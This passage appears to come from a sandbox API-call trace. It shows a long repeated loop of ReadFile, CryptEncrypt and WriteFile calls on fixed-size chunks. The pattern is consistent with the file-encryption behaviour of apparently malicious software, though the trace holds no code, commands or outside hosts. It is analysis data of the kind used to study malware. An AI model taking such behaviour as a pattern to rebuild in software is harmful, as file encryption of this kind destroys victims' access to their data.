(in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.140] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.140] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.140] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.140] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.141] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.141] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.141] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.141] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.141] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.141] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.141] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.141] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.142] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.142] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.142] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.142] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.143] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.143] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.143] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.143] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.144] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.144] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.144] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.144] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.145] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.145] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.145] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.145] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.146] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.146] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.146] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.146] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.146] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.147] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.147] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.147] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.147] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.147] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.147] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.147] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.147] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.148] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.148] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.148] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.148] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.148] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, 